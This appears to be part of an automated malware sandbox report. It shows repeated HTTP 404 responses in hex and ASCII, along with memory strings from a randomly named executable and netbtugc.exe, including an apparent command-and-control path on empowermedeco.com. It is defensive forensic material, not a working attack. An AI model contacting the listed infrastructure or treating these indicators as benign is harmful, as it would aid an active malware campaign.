            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 07 Dec 2024 06:00:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 07 Dec 2024 06:00:58 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 07 Dec 2024 06:01:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 07 Dec 2024 06:01:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 07 Dec 2024 06:01:06 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:00 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Dec 2024 06:03:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4475242478.0000000004ECC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4475242478.0000000004ECC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.4475931806.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
